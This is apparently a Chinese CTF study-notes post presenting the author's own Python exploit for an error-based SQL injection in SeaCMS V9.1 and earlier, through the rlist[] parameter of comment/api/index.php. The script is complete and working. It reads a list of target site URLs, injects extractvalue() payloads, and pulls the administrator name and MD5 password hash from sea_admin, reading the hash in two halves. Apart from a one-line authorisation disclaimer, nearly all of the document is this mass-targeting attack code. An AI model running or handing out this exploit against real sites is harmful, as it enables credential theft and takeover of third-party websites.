「配枪朱丽叶。」

RootのCTF学习笔记。

自己写的Seacms漏洞利用脚本

SeaCMS V9.1 及以下版本的 SQL 注入漏洞（注入点为 comment/api/index.php 的 rlist[] 参数，通过 extractvalue() 报错回显数据）。本脚本仅限在已获授权的目标上使用。

通过报错注入获取管理员表 sea_admin 中一条记录的账号（name）及其密码的 MD5 值。注意：MySQL 的 XPATH 报错信息最多回显 32 个字符，其中 2 个被 `\ ` 标记占用，因此超过 30 个字符的值（如 32 位 MD5）需要用 substr() 分段读取；子查询也应加 LIMIT 1，否则当 sea_admin 中存在多条记录时会因 "Subquery returns more than 1 row" 而失败。

使用前需在脚本同级目录新建 dir.txt，每行填写一个目标站点的根 URL（如 http://example.com，结尾不要带斜杠，脚本会自动拼接 /comment/api/index.php 路径）。

#SeaCMS 
#Author:Root
import requests
import time
import re
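# Injection point: the rlist[] parameter of comment/api/index.php. The SQL
# expression substituted for {expr} runs inside extractvalue(); MySQL echoes
# its result back in the XPath error message, which the page renders.
INJECT_PATH = (
    "/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue"
    "(1,%20concat_ws(0x20,%200x5c,({expr}))),@`%27`"
)

# MySQL truncates the XPath error text to 32 characters, and the leading
# "\ " marker uses two of them, so at most 30 characters of a value come
# back per request. A 32-char MD5 therefore has to be read in two halves.
# LIMIT 1 keeps the scalar subquery valid when sea_admin holds several rows
# (without it MySQL raises "Subquery returns more than 1 row" instead).
NAME_QUERIES = ["select%20name%20from%20sea_admin%20limit%201"]
PASS_QUERIES = [
    "select%20substr(password,1,16)%20from%20sea_admin%20limit%201",
    "select%20substr(password,17,16)%20from%20sea_admin%20limit%201",
]

# Captures the leaked value between the "\ " marker and the closing quote.
LEAK_RE = re.compile(r"XPATH syntax error: '\\ (.*?)' <")

# Seconds to wait for each HTTP request before giving up on a target.
REQUEST_TIMEOUT = 10


def build_url(base, expr):
    """Return the full injection URL for SQL expression *expr* against site root *base*."""
    return base + INJECT_PATH.format(expr=expr)


def parse_leak(body):
    """Return the value leaked through the XPath error in *body*, or "" if none."""
    return "".join(LEAK_RE.findall(body))


def fetch_leak(session, base, expr):
    """Run one injected query against *base* and return the leaked value ("" if none).

    Raises requests.RequestException on connection or timeout errors.
    """
    resp = session.get(build_url(base, expr), timeout=REQUEST_TIMEOUT)
    return parse_leak(resp.text)


def fetch_value(session, base, queries):
    """Concatenate the pieces leaked by *queries*; "" unless every piece came back."""
    pieces = [fetch_leak(session, base, query) for query in queries]
    return "".join(pieces) if all(pieces) else ""


def exploit(session, base):
    """Return (admin name, admin password hash) for *base*; each is "" on failure."""
    name = fetch_value(session, base, NAME_QUERIES)
    password = fetch_value(session, base, PASS_QUERIES)
    return name, password


def main(target_file="dir.txt"):
    """Run the exploit against every non-empty line (a site root URL) of *target_file*.

    Only use this against systems you are authorised to test.
    """
    with open(target_file, "r", encoding="utf-8") as targets:
        for line in targets:
            base = line.strip()
            if not base:
                continue
            print(time.strftime('%Y-%m-%d %H:%M:%S'))
            try:
                name, password = exploit(requests.session(), base)
            except requests.RequestException as exc:
                # Network errors only: a KeyboardInterrupt still stops the run.
                print("[*]Cannot connect " + base + " (" + str(exc) + ")")
                continue
            if name and password:
                print("[*]Success! " + base)
                print("[*]AdminName: " + name)
                print("[*]AdminPass: " + password + '\n')
            else:
                print("[*]We found nothing in " + base)


if __name__ == "__main__":
    main()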